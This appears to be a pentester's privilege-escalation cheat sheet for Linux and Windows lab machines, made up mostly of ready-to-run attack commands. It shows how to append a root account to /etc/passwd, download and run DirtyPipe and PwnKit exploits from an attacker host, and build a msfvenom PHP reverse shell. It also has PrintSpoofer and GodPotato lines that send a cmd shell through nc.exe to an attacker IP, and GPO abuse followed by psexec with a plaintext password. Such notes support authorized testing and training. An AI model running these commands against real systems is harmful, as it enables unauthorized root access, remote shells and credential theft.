Situational Awareness

- Username and hostname
- Group memberships of the current user
- Existing users and groups
- Operating system, version and architecture
- Network information
- Installed applications
- Running processes

Linux

Automated tools

• linpeas - /usr/share/peass/linpeas/linpeas.sh
• unix-privesc-check - /usr/share/unix-privesc-check/unix-privesc-check
  • ./unix-privesc-check standard > output.txt
• PSpy - https://github.com/DominicBreuker/pspy/blob/master/README.md
• lse.sh - /home/kali/tools - https://github.com/diego-treitos/linux-smart-enumeration

Manual enumeration

General enumeration

id
hostname
uname -a
cat /etc/issue
cat /etc/os-release
ifconfig a
route
# netstats -anp 
netstat -tulpn
# ss -anp
cat /etc/iptables/rules.v4
sudo -l
echo $PATH
(env || set) 2>/dev/null
dpkg -l
env

/etc/passwd

cat /etc/passwd

joe:x:1000:1000:joe,,,:/home/joe:/bin/bash # example output

- Login Name: "joe" - Indicates the username used for login.

- Encrypted Password: "x" - This field typically contains the hashed version of the user's password. In this case, the value x means that the entire password hash is contained in the /etc/shadow file.

- UID: "1000" - Aside from the root user that has always a UID of 0, Linux starts counting regular user IDs from 1000. This value is also called real user ID.

- GID: "1000" - Represents the user's specific Group ID.

- Comment: "joe,,," - This field generally contains a description about the user, often simply repeating username information.

- Home Folder: "/home/joe" - Describes the user's home directory prompted upon login.

- Login Shell: "/bin/bash" - Indicates the default interactive shell, if one exists.

If writable: -> For backwards compatibility, if a password hash is present in the second column of an /etc/passwd user record, it is considered valid for authentication and it takes precedence over the respective entry in /etc/shadow, if available

openssl passwd _PASSWORD_ # use OpenSSL to crypt the password

echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd

su root2

-> the output of the OpenSSL passwd command may vary depending on the system executing it. On older systems, it may default to the DES algorithm, while on some newer systems it could output the password in MD5 format. ($1$ -> md5crypt)

Enumerating network interfaces, routes and open ports

ip a

-> check which networks is the client connected to

routel # or route

-> display network routing tables

ss -anp
netstat
netstat -tulpn

-> display active network connections and listening ports

iptables --help # must be root
cat /etc/iptables/rules.v4 # iptables-persistent package

-> inbound and outbound port filtering -> Linux-based systems, we must have root privileges to list firewall rules with iptables

Crontab

ls -lah /etc/cron*
crontab -l
grep "CRON" /var/log/syslog # cron log file

Frequent cron jobs (more info here)

for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;

Find writable directories

find / -writable -type d 2>/dev/null

Find files with SetUID capabilities

find / -perm -u=s -type f 2>/dev/null
grep Uid /proc/<process ID>/status -p \;
chmod u+s <filename> # set file with SUID 

-> when running an executable, it normally inherits the permissions of the user that runs it. However, if the SUID permissions are set, the binary will run with the permissions of the file owner.

/usr/sbin/getcap -r / 2>/dev/null

-> Even though they seem similar, capabilities, setuid, and the setuid flag are located in different places within the Linux ELF file format.

Processes enumeration

watch -n 1 "ps aux" | grep pass

Enumerate mails

cat /var/mail/*

Disks

cat /etc/fstab
mount
lsblk
lsmod
/sbin/modinfo _MODULE_NAME_

-> once obtained a list of drivers and versions, we are better positioned to find any relevant exploits

AppArmor

-> AppArmor is a kernel module that provides mandatory access control (MAC) on Linux systems by running various application-specific profiles, and it’s enabled by default on Debian 10.

sudo aa-status

Kernel vulnerabilities

cat /etc/issue
uname -r
arch

-> then search with searchsploit

DirtyPipe

wget http://<LHOST>/DirtyPipe-Checker/dpipe.sh
chmod +x dpipe.sh
./dpipe.sh

wget http://<LHOST>/DirtyPipe/compile.sh
wget http://<LHOST>/DirtyPipe/exploit-2.c
chmod +x compile.sh
./compile.sh
./exploit-2 /usr/bin/sudo

OR

wget http://<LHOST>/DirtyPipe/exploit-2
chmod +x exploit-2
./exploit-2 /usr/bin/sudo

-> Check docs for other ways: DirtyPipe

PwnKit

pkexec --version

-> if version <= 0.105 it is vulnerable

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit
./PwnKit "id"
./PwnKit

Process that runs as root

Make a process that runs as root execute the command:

id;chmod u+s /bin/bash

Then privesc with:

ls -alh /bin/bash
/bin/bash -p -i 

Capture traffic

sudo tcpdump -i lo -A | grep "pass"

-> tcpdump cannot be run without sudo permissions. That is because it needs to set up raw sockets in order to capture traffic, which is a privileged operation.

Windows

Manual enumeration

General enumeration

whoami
whoami /groups

• hostname of the system -> infer the purpose and type of a machine (ex: WEB01, MSSQL01, …)
• groups user is part of

powershell
PS > Get-LocalUser
PS > Get-LocalGroup # or net localgroup
PS > Get-LocalGroupMember _group_name_
PS > net user _username_

• get users on the machine
• which groups are active and which not
• Remote Desktop Users

PS > systeminfo

• OS exact version -> build number and review the existing versions of the identified operating system
• architecture

PS > ipconfig /all
PS > route print
PS > netstat -ano

• identify all network interfaces, routes, and active network connections
• identify new services or even access to other networks

PS > Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
# always check 32-bit and 64-bit Program Files directories located in C:\
# always check \Downloads of user

• installed applications

PS > Get-Process

• processes

PS > Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

• get specific files anywhere in the system

PS > Get-History
PS > (Get-PSReadlineOption).HistorySavePath
PS > type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS > ls env:\

• PS history
• context (env variables)

Apache user reverse shell (check whoami /priv)

icacls C:\xampp\htdocs

msfvenom -p php/reverse_php LHOST=$LHOST LPORT=$LPORT -f raw > shell.php

add it to:

C:\xampp\htdocs\assets

Then visit the page to send reverse shell and obtain access as user apache! -> check whoami /priv, maybe there are some easily exploitable privs with this user

Scheduled tasks

schtasks /query /fo LIST /v

Runas

runas /user:_username_ cmd

whoami /priv

Always check this command:

whoami /priv

If SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege are enabled, easy vector for privilege escalation.

Printspoofer.exe

https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

Upload PrintSpoofer.exe and nc.exe.

.\PrintSpoofer.exe -c ".\nc.exe <IP> <PORT> -e cmd"
.\PrintSpoofer64.exe -i -c powershell.exe

GodPotato

.\godpotato4.exe -cmd "cmd /c .\nc.exe 192.168.45.207 1337 -e cmd.exe"

RogueWinRM

RogueWinRM.exe -p C:\windows\system32\cmd.exe

Icacls

icacls <EXECUTABLE FILE>

Useful commands

ls env:\

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

Automated enumeration

.\winPEAS.exe

iwr -uri http://_LHOST_/PowerUp.ps1 -Outfile PowerUp.ps1

powershell -ep bypass

. .\PowerUp.ps1 # check Hijacking file

PsExec

*Evil-WinRM* PS C:\tmp> ./powerview.ps1
*Evil-WinRM* PS C:\tmp> get-gpo -name "Default Domain Policy"

DisplayName      : Default Domain Policy
DomainName       : vault.offsec
Owner            : VAULT\Domain Admins
Id               : 31b2f340-016d-11d2-945f-00c04fb984f9
GpoStatus        : AllSettingsEnabled
Description      :
CreationTime     : 11/19/2021 12:50:33 AM
ModificationTime : 11/19/2021 2:00:32 AM
UserVersion      : AD Version: 0, SysVol Version: 0
ComputerVersion  : AD Version: 4, SysVol Version: 4
WmiFilter        :

*Evil-WinRM* PS C:\tmp> Get-GPPermission -Guid 31b2f340-016d-11d2-945f-00c04fb984f9 -TargetType User -TargetName anirudh                                                        
Trustee     : anirudh                   
TrusteeType : User                        
Permission  : GpoEditDeleteModifySecurity     
Inherited   : False            

-> SharpGPOAbuse

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"

Then we need to reload the runtime modules:

gpupdate /force

And then we use impacket-psexec to obtain NT AUTHORITY\SYSTEM:

impacket-psexec vault.offsec/anirudh:SecureHM@192.168.199.172

wmic qfe list

wmic qfe list

Each article bore an ID number and articles were often referred to by their Knowledge Base (KB) ID. Enumerate KBs in order to understand if there are obsolete patches → example SMBGhost [[Billyboss - Walkthrough#Escalation#Installed Patches Enumeration]]

Useful resources

HackTricks PE Linux g0tmi1k PE Linux swisskyrepo PE Linux

HackTricks PE Windows ihsansencan PE Windows

General

Docker Container

The machine’s hostname suggests we are actually in a Docker container that we must first escape.

$ hostname
f8e1a236869d

$ mount

-> When a container is created with a tmpfs mount, the container can write files outside of the container’s writeable layer. As opposed to volumes and bind mounts, a tmpfs mount is temporary and only persists in the host’s memory.